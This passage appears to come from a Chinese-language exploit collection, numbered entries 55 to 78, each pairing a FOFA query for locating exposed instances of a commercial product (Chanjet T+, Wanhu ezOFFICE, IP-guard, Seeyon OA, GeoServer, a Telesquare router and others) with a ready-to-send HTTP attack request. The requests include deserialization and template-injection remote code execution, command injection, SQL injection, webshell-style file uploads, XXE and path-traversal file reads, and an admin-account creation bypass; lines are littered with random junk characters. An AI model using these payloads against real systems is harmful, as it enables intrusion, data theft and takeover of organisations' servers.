5 N# ^5 p7 @1 x0 s第二步,利用获取到的Cookie请求+ @7 G0 K+ ]1 F+ F* M3 O  X/ L- g
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
1 l8 F" f$ z- r, \5 _
# h. o6 E& b; S, m56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE$ T/ j3 y6 `+ H4 ^
FOFA: app="畅捷通-TPlus"' ^; C/ p7 e- E8 @- X
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1- N( Y+ I1 S* n6 a/ m
Host: x.x.x.x! J" ?8 v6 ~. ?* k0 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
2 v% x  K, Y4 l$ u' p5 k' sContent-Type: application/json
! ~0 z( d$ h3 a. a# w% s8 J
, o' Z. t/ Q6 g$ F% I{# f2 ]0 Q7 a' J% C- H
  "storeID":{
6 K7 ^/ T8 i5 _    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
: q8 ?0 f' r0 G7 n) d: C6 j   "MethodName":"Start",
6 e2 z& G1 R7 g9 T4 p; G    "ObjectInstance":{8 p# A5 A) E1 ]- F" k" D
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",2 u7 ^* u; V/ A
        "StartInfo": {0 n/ z0 V; V- }0 D1 i; J
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
" @, {/ \# m# V% K( I           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
+ d, P- V0 u" x( e# W- Q+ J       }
# T. E- B5 ?+ N% Y2 X, A' l    }
2 N# l+ Y, ?! w) N' y  }2 a; y/ |6 \+ c1 {/ d7 |
}: Y: K3 D! l/ t( L8 M. g( ?* ?
) l- C, ~, u& i& w3 B7 `
. y8 q( l+ ?" k9 @/ P9 i7 c( Q# ~1 n
57. 畅捷通T+ keyEdit.aspx SQL注入
# a4 d) e2 t! p7 _6 t! Q$ g# xFOFA:app="畅捷通-TPlus"- p  T" z% O+ W8 U2 n
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
4 i0 A' f0 V6 M- R8 J' _, D) z) iHost: host
' c% t" m5 u! h6 r9 u1 `$ MUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36: h9 l/ e5 B0 G2 ?5 l" ]
Accept-Charset: utf-8
* z. T8 y; {" v2 A+ XAccept-Encoding: gzip, deflate& a4 y& {1 n. Y0 k' Q+ ^
Connection: close
8 @" A' w0 e' v6 g  U; n
0 ]) H$ h& X% R4 B/ R4 v! w1 ~. Y3 A4 E3 H1 g
58. 畅捷通T+ KeyInfoList.aspx sql注入4 S0 t, ~* L: D. k, ~2 r, T) ~
FOFA:app="畅捷通-TPlus"
4 D/ Q' D2 j4 cGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
% T/ P; l! ]) qHost: your-ip
6 f6 n' B( c& l$ m% V0 ~User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
  q+ B. [# H' }: `  L  RAccept-Charset: utf-81 y; l" K2 K* Z; g% X; s
Accept-Encoding: gzip, deflate
5 i+ B6 p! [8 wConnection: close# Q, c" a$ ]3 `) G- ~4 w
2 _; f( n: W7 y; U7 w' V
5 ]7 k! [5 K. l0 P* {! N7 ]
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
, e, B2 R- a0 Z8 }& l. B$ k( jFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"! A9 B) s* i1 `) M, y: C" L+ j# S
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
4 X0 A( L8 v% r, C0 j0 q% dHost: 192.168.86.128:90901 i, Q! _; }" g0 B
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36, T- g; x3 e8 [5 t  G
Connection: close
8 \! ~' c! L/ cContent-Length: 1669/ X! A: u# l# T% `" I1 d
Accept: */*) N! V' e0 z+ f( Q* a
Accept-Language: en$ w, f; P& D5 G$ G8 f
Content-Type: application/x-www-form-urlencoded) ]: f" c8 i. _) W, R3 P
Accept-Encoding: gzip, ]: K9 B5 V! x4 J" N$ v
- E3 H: R* k) l! v5 d: v8 ~
PAYLOAD  C! f3 e, o9 _  G5 [/ F- ^
5 d8 O$ g# b# f0 ]- z

* ^% R2 V5 j0 p60. 百卓Smart管理平台 importexport.php SQL注入% X' J5 G8 Y- q7 q, ^( P9 y3 m; x
FOFA:title="Smart管理平台": t% d" W( u6 b6 p, e! v
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
3 B% @/ |5 o4 k) b) EHost:" U% n1 D9 U7 J$ Y) n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.362 D3 `$ G9 k* U( I4 x) W0 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* p7 ]9 [6 ?% f4 O& V. T* `
Accept-Encoding: gzip, deflate. Y: m$ t, V& K9 {2 Y% l! p& S* t  h
Accept-Language: zh-CN,zh;q=0.9
/ |1 C) m# r* |/ \$ |8 }/ M- M( VConnection: close$ ^2 U: i; s# W* |
  e( [8 Y3 _  G% ^& |
, f# X  a# _/ [4 H3 a2 q
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传8 o8 ?9 t$ n! c
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
! N7 t8 j$ [* B+ N( mPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
2 U! @9 a7 B: }9 [; MHost: x.x.x.x
" ^& I6 v* L9 D* h  M7 ~6 M+ HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ W! c# p% Z+ v7 z: S
Connection: close
# }' M3 B' i/ M2 z2 h( Y& nContent-Length: 27$ B- c  u) s( ]. O
Accept: */*! g' Y1 m7 F) R* G
Accept-Encoding: gzip, deflate
; I( Y3 }  N: P% _8 k5 _. a; k/ ~Accept-Language: en  }6 E4 ~/ e, U: T2 B/ B9 D
Content-Type: application/x-www-form-urlencoded# E# z" C- z: q2 B6 K  m1 ^' d

2 L- A7 F5 S9 u4 X6 @5 ?/ ~8uxssX66eqrqtKObcVa0kid98xa$ h* |6 B( X: T. t; d( Y

8 ~, w- B, H# I
3 i. T( W2 j4 X# E62. IP-guard WebServer 远程命令执行
# r7 x1 I$ x4 F: h4 F9 vFOFA:"IP-guard" && icon_hash="2030860561"! r% m2 H& R8 \3 D8 g2 b
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.12 }" [5 x4 ~2 a
Host: x.x.x.x& l6 y  e3 i/ n( I" N5 I2 w% Q  w
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.364 R  Q3 I. [2 [. G. b* e: D" P1 s
Connection: close* z5 M3 T. G9 a/ n
Accept: */*! }: k. F& d) M& P
Accept-Language: en
' e5 i( H& z- q" Y& nAccept-Encoding: gzip3 f5 g( O3 K/ D# Y& R

+ t1 M( _+ B! b& s& _& t1 O2 [+ R) n5 j+ H+ `
访问8 J0 ^& X, \: S4 V# \" Z
& V% b* y) v% \9 G* O1 t
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1: P  S- l! H, f! S
Host: x.x.x.x
# c" G6 d: {& ^8 u1 S# G3 L' ?) ]
& @/ }. ?5 z8 \4 b" N: A. T0 D1 P- [% z5 c+ e
63. IP-guard WebServer任意文件读取
/ \" }' M  A3 q9 i9 ^- ]IP-guard < 4.82.0609.0
7 `5 b. o- c) ?9 O- T0 F+ p5 u9 [1 NFOFA:icon_hash="2030860561"
8 Y+ t" O8 w3 y- t2 PPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
8 D1 J; Y" c* C* @Host: your-ip2 j+ t  }9 z) c# Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
' P, |3 F( D% V$ L6 [5 UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% T: n# ~$ J0 p( T  P* J3 zAccept-Encoding: gzip, deflate
: z2 ^! q& ~8 B9 V0 U" [' p: O( qAccept-Language: zh-CN,zh;q=0.94 T) Z0 {4 y" Q$ `- Y* |  S, T
Connection: close3 H& g$ Y" e1 l5 S
Content-Type: application/x-www-form-urlencoded
7 a: R8 z, e2 t; }2 g
- F6 z! p1 z# Z; hpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A+ h$ Y, X4 ^% ^

& [- y! J% w  m& g9 j# V- u0 k64. 捷诚管理信息系统CWSFinanceCommon SQL注入
( @8 l1 d$ ^; S/ vFOFA:body="/Scripts/EnjoyMsg.js"& [4 ~0 p! t6 N$ u/ b# T
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1- i# b0 z9 R" b  Z( \2 w6 ~0 a2 ^; G
Host: 192.168.86.128:9001
3 z/ u6 M: s' |0 v: _3 D( B) bUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
6 I8 q. l& ]. T+ _' O! A  `; A: V$ OConnection: close
' k2 i9 F1 j. y- q/ gContent-Length: 3698 y4 w0 a0 D& {7 A, Z" l* {
Accept: */** m; q6 p+ A, J6 B& \
Accept-Language: en3 u( k) F% O/ J" Q+ f6 j" v& f. {, k
Content-Type: text/xml; charset=utf-89 |, o9 u9 W" L) f6 F# w8 O
Accept-Encoding: gzip7 M5 m7 L! |: c7 g" r

, R. E5 q6 G* z. L0 [! N3 _. v! A<?xml version="1.0" encoding="utf-8"?>' ^1 T5 h# B& j3 Q3 Z4 v7 d" v$ Y
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  x2 {( N( I" I% `" R1 B9 T3 q4 C<soap:Body>
- ?& F7 U8 r& {  @) f    <GetOSpById xmlns="http://tempuri.org/">& H& D; N0 j8 l0 ]2 q# x+ r
      <sId>1';waitfor delay '0:0:5'--+</sId>/ }0 z) A' U0 K, n7 E
    </GetOSpById>
1 n$ ~3 E( ?3 w( W" c  </soap:Body>
& R8 ]+ k) a# P# v</soap:Envelope># e, f1 S/ C# D, }
" o5 n4 `' h3 p  B3 \' q4 T
3 Q$ e! D2 {! s1 x
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过( Y1 k5 f& A4 }5 P
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"* j' V+ p; `' W6 m, A) {
响应200即成功创建账号test123456/1234566 Q0 ?5 g8 `/ @# U% S  c* q5 i
POST /SystemMng.ashx HTTP/1.1
4 l& h5 o% A: _. O- y) i' THost:
3 {! r$ A. j: T1 ^( kUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
4 W1 T) a* G0 q) }. ]) uAccept-Encoding: gzip, deflate. V- l  H0 q& w0 I2 b3 o  Q2 @" U' }
Accept: */*0 [& e, g8 R: {, G8 b/ S
Connection: close; E* o; x0 l& I
Accept-Language: en
6 |) h5 A) Q8 Y; G; PContent-Length: 174
- V. ^4 ^: u' ~' V; e( W7 D0 J9 k. D: c9 H; x! m
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
  ^3 y- j( z; i6 o# o# I5 e0 X& `" ~, x/ C* H

; Y6 m( ?, C3 E6 V/ c2 v) K66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
: N) b  H+ j2 a2 XFOFA:app="万户ezOFFICE协同管理平台"
# Q% T8 H- m/ p; N4 s/ x+ ]6 W7 a7 f9 L0 U5 f7 j5 ]! d+ g8 T
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
6 _/ E7 V( j: s; g- NHost: x.x.x.x9 U+ D* w5 D. q7 F: O$ B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36$ ]/ }: g! J6 F& y  C. D
Connection: close# C. _2 @( g% v6 A3 _
Accept: */*
/ o: U: `% S6 P. x: a1 n2 IAccept-Language: en6 r# }2 w# |7 w* r9 a; k
Accept-Encoding: gzip
4 U. K7 A( S3 Y# ~
1 H5 k+ R* d" j, P( f& O" \& M0 q4 u" w6 J% _3 j) V5 S# o
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在( Y, f. y0 K! m2 A$ t& F7 D4 W( q

1 u. g4 Z' v$ I( V# o+ y4 @, `67. 万户ezOFFICE wpsservlet任意文件上传
0 v7 X2 P4 X( C5 _; cFOFA:app="万户网络-ezOFFICE"
# x# j; C5 k8 n4 k# y7 l3 hnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
# f; J. l& \7 ~, ?, V9 dPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
8 g. P! c4 l! j0 C; X0 Z" V" {Host: x.x.x.x
% D+ a! w+ T9 `) ?& i& VUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0/ C) ?. V4 p( v! L
Content-Length: 173
4 c/ H% P9 A: P3 x) p, w& @0 yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
! ]: M; c6 ~3 x) X# BAccept-Encoding: gzip, deflate
/ l6 M9 Y2 X" _5 TAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3$ d) ~! Z  q4 d6 o  @
Connection: close5 H$ }, x2 T0 ^
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp1 j. t* O* C, A& x, S  X
DNT: 1
  _3 W9 P9 V( i' b- e2 ?/ kUpgrade-Insecure-Requests: 12 l5 p+ l) ]( c6 v
5 d6 ]1 u1 p6 P: q; v9 |& @2 B: U
--ufuadpxathqvxfqnuyuqaozvseiueerp
2 z6 Q  b* l  @+ V6 f% D: w% EContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"! m9 p* T  b' a: N! F+ d: g3 `( O

/ P8 x6 [! Q- f6 t! k) {. M; I) {- Y<% out.print("sasdfghjkj");%>3 ~# e1 |4 ]/ S
--ufuadpxathqvxfqnuyuqaozvseiueerp--
. O) Q$ p, I: d( S8 f! C$ T1 V; _! w! S2 m+ l1 J
9 L$ O( |5 Y2 i# x
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
+ E, h: Y$ |3 V6 L6 ^1 q6 I5 c5 Z, K+ ]! |3 ?& P6 b; r) w3 h
68. 万户ezOFFICE wf_printnum.jsp SQL注入% {& r& v' j) D& ?% t
FOFA:app="万户ezOFFICE协同管理平台"
' O- ]. W# B8 ?4 z" ~2 zGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
! \) m" [8 g1 y4 PHost: {{host}}
- X% ~4 H: ^  j3 A+ {) C, _9 d( EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
# j$ N8 @% @5 _Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
: A* }% }/ O3 o4 ?/ b8 Y5 o4 q8 cAccept-Encoding: gzip, deflate
7 e7 I: }6 d$ D7 i( }3 mAccept-Language: zh-CN,zh;q=0.95 E. H2 u$ l! K
Connection: close' Z' f$ J* a  E+ O" u% p
5 @& G8 ?1 P7 y: j
; ^: e, D. z; V6 T) Z
69. 万户 ezOFFICE contract_gd.jsp SQL注入  I' @( I5 O+ m0 V
FOFA:app="万户ezOFFICE协同管理平台". }" \# Y: V9 e' p+ Q
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
2 D/ I) Q9 g4 D' J. kHost: your-ip
, Q4 ?1 t2 S: k( T( hUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
5 N' w. N: N' yAccept-Encoding: gzip, deflate
, l- q' ~, H% v6 pAccept: */*
/ t" f6 R. e$ {$ A4 {" cConnection: keep-alive) w+ i5 c6 s  H! M: O3 k3 R

8 B5 t& y! `# H
9 n1 A2 v9 @% {' D70. 万户ezEIP success 命令执行1 i" I: j. s8 W
FOFA:app="万户网络-ezEIP"
+ ]: z: F8 t2 f- E" {POST /member/success.aspx HTTP/1.1
! J( Y: {" I4 M( s' C: s; M* cHost: {{Hostname}}" S/ ?' Y% f. v9 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.364 j% O. T/ D6 [6 @8 v( `
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=) f6 |1 H; \+ O( i4 E% R
Content-Type: application/x-www-form-urlencoded
2 E% [' _  h, h: x* i. E. n0 STYPE: C
. l5 R) F! H+ Q9 h2 e' VContent-Length: 16702, k6 r# Y- @7 [% s, f

! K8 f2 l- k5 Y# E$ E__VIEWSTATE=PAYLOAD
- ]7 `! h4 F/ P2 {$ }7 K% z
: p4 \# d" @, }& c) z- C5 g( i! \, M8 n! A3 F3 q8 |! ], }4 M# w
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
. E; u' b* n; z- _FOFA:body="PM2项目管理系统BS版增强工具.zip"
( Q6 t9 B0 ^0 [GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1$ G! d) }- V7 a( Z8 x
Host: x.x.x.xx.x.x.x
% ?8 m$ p9 N$ K8 i! n5 _User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
% a* L$ }- \- t/ b+ JConnection: close$ S( _. j* a9 N; N" t' n# J* Y; w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  h, Y( L& k5 H& q" l/ dAccept-Encoding: gzip, deflate
! e8 t, u1 z0 q. `! f- \0 F6 TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ W. s8 J9 N1 b; N# n- Z) h, a
Upgrade-Insecure-Requests: 1
: B, l3 m; s7 F* g2 D% L1 ]0 @5 j( Q0 G3 s, v' `
8 b" v0 `( R4 N
72. 致远OA getAjaxDataServlet XXE# S3 u% o1 H* \  L
FOFA:app="致远互联-OA") e. z- |- Y# L5 ^# i
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.11 `+ I+ t1 D2 ]1 q
Host: 192.168.40.131:8099
2 D2 O( p/ E( uUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36! {6 ~+ T  a- S2 U
Connection: close# R' z- x" J6 T
Content-Length: 583% d; V4 ^4 K' o: a' G
Content-Type: application/x-www-form-urlencoded. Q/ t6 m7 i: u$ X6 s7 j; L/ J- }
Accept-Encoding: gzip
9 N* c, R9 ^3 B% I/ }+ [" B7 D9 i4 r' c3 `
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
' [/ L% ], ^! X' z! |# D; c. C: ~3 ?& R. b+ M1 I, ~

: s# b& J. A# O7 L# I! X73. GeoServer wms远程代码执行5 {9 A2 l+ Z; S6 y9 @* Z; V
FOFA:icon_hash=”97540678”8 K+ d5 x. _1 T5 a3 S" Z- K
POST /geoserver/wms HTTP/1.1
8 a( m' N6 \$ Y, A: G; Z+ j) gHost:4 V8 m- z8 s8 ~2 J: O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
' ~" _  t2 @4 r) ~9 ]7 C8 iContent-Length: 19815 v% w0 J1 s4 ~6 H# X: W. @
Accept-Encoding: gzip, deflate4 S& c( t$ z! |$ h  h% m; h. K
Connection: close
9 T- q( u8 u( {0 Y) ^Content-Type: application/xml
8 A5 k: B4 l( O: hSL-CE-SUID: 3
& n! `- K$ A" M* M* A) [
8 w' {7 l: ^7 `: ?* h8 e3 U' vPAYLOAD. O" B) r/ V: |* G8 q6 m1 n

# D$ u; w0 H2 _: {; H1 H, t* ^( J0 ^' L
74. 致远M3-server 6_1sp1 反序列化RCE
* y& E1 P, l( r  nFOFA:title="M3-Server"
7 h2 e: b- w! Q0 \- k- dPAYLOAD
9 L  w2 V2 D+ M& S/ t0 j7 S# C7 \% k. O4 _# s# z; o
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
0 ~% l9 K. b$ F% ?2 f! tFOFA:app="TELESQUARE-TLR-2005KSH"2 N. C8 \2 N1 D" ?& y5 t$ h+ j. f
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
4 S) l3 E; F2 s& |# ]% P+ XHost: x.x.x.x; S, e9 R1 Z9 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
( g7 ^5 f9 P9 j, jConnection: close1 x% X) q* t" X2 G5 m/ R
Accept: */*4 |& f$ T6 j' g: m; Y
Accept-Language: en* C% \. F& i5 L2 T) G0 A2 i
Accept-Encoding: gzip
( v6 l6 t& ^( N4 f) Z. I+ ]  r& p, u* G/ S. u* c$ ^  @, m- D
" c9 H1 m. t+ w
GET /cgi-bin/test28256.txt HTTP/1.1  F7 k! M! ^, p9 a6 X
Host: x.x.x.x
4 D# P$ T- \5 Z- A1 p6 ?# O/ z1 S$ I# l! I7 `1 \
! c' p5 ~+ }" R' r9 n' T
76. 新开普掌上校园服务管理平台service.action远程命令执行
7 q; ~4 B  T4 \3 oFOFA:title="掌上校园服务管理平台"
3 C. u$ w; m5 ^/ K8 v# e4 M5 ePOST /service_transport/service.action HTTP/1.1
- P! t8 |$ V2 N7 T9 j" D, D( T7 Z! aHost: x.x.x.x/ u* }+ W: H. N, f0 A& T0 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
, A( n. D- v/ ^5 MConnection: close3 G8 ]$ U! R. D' M0 c( G
Content-Length: 211' }3 [/ |; F- L9 r1 Q$ `$ P0 \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! f' x. d% r% g+ B( d  Q# ^
Accept-Encoding: gzip, deflate
' E& V3 y* U( k+ q3 s5 OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! i& A" p4 p0 r7 F  R% Q
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4- R3 o4 p8 `1 z0 A! N
Upgrade-Insecure-Requests: 1
& N7 v3 \1 e; v7 N; t+ l0 O7 _. K$ p" h% l1 U
{
+ x" j$ a8 M9 `4 P1 E"command": "GetFZinfo",1 [$ l+ q! \2 Y, W0 Y
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
8 k( O  d1 l; @/ x$ e! S+ L  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"/ u( l' Q# l* ]# F
}( m/ j% r* R1 z/ g! {
1 w, @$ O* G" K% g
; p9 z8 E( Q0 M0 C# G
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.11 d6 e+ Z7 Y2 F( \% O9 c) Y- F6 V
Host: x.x.x.x
+ n: H. |5 \3 ~) ]) f
/ c, q# g2 m3 W* S: d% j3 B, W; l! r$ I! m
5 [, J  n/ d, C4 ]
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
" X8 f- u  Q+ W# dFOFA:body="F22WEB登陆"6 {! T  `, e4 ~5 t1 b4 C
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1* j7 |; _7 d  F8 f9 d. [: o
Host: x.x.x.x
# {' z! f9 m1 v$ xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
6 _/ a2 P: ~8 B/ i' s  _5 L8 |# KConnection: close: k1 b/ d3 }4 w. X3 Z. f$ v
Content-Length: 433
- D2 u" R3 @( lAccept: */*
- R4 D+ a; T- [0 MAccept-Encoding: gzip, deflate
2 J' Y0 a8 ?! u% L2 B3 t2 qAccept-Language: zh-CN,zh;q=0.9- O+ b4 a, B+ l) E" B
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix% F$ [* I0 D! w! K. m
- X8 q7 M1 t& g2 [* \8 u! t
------------398jnjVTTlDVXHlE7yYnfwBoix. @9 `' R: }; F. L
Content-Disposition: form-data; name="folder"
% n% B  h7 I6 ]7 ^
( Q: M1 b) P/ `/upload/udplog
- |- K5 [0 |- E' z' A------------398jnjVTTlDVXHlE7yYnfwBoix. Y" W; |2 ?  A% m, Z- e/ X. V
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"2 S, x0 W+ K* Q" l3 F: {
Content-Type: application/octet-stream# C3 P8 |* i# w' v! A" c
9 o% Q8 c: z/ W3 d2 F
hello1234567
8 t& i" H7 j: Q/ G# N: I6 O2 f------------398jnjVTTlDVXHlE7yYnfwBoix
" ^' t. C+ j% D# s; q2 _/ MContent-Disposition: form-data; name="Upload": k  e+ {% p* t8 q

- w, [5 a# M" n0 W4 B) ]Submit Query# K8 z3 h" z$ N7 I
------------398jnjVTTlDVXHlE7yYnfwBoix--
: X) f* _* D6 A* w3 r- s9 g$ M3 ?1 l! i5 x- X
6 j" G' P+ @. q2 _: i
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
% ?& Q- f* i( t  t% S) AFOFA:icon_hash="2001627082"4 V& b  i+ D5 S* B# z+ w
POST /Platform/System/FileUpload.ashx HTTP/1.1! l3 j: {, s; n1 x  }' `9 _
Host: x.x.x.x
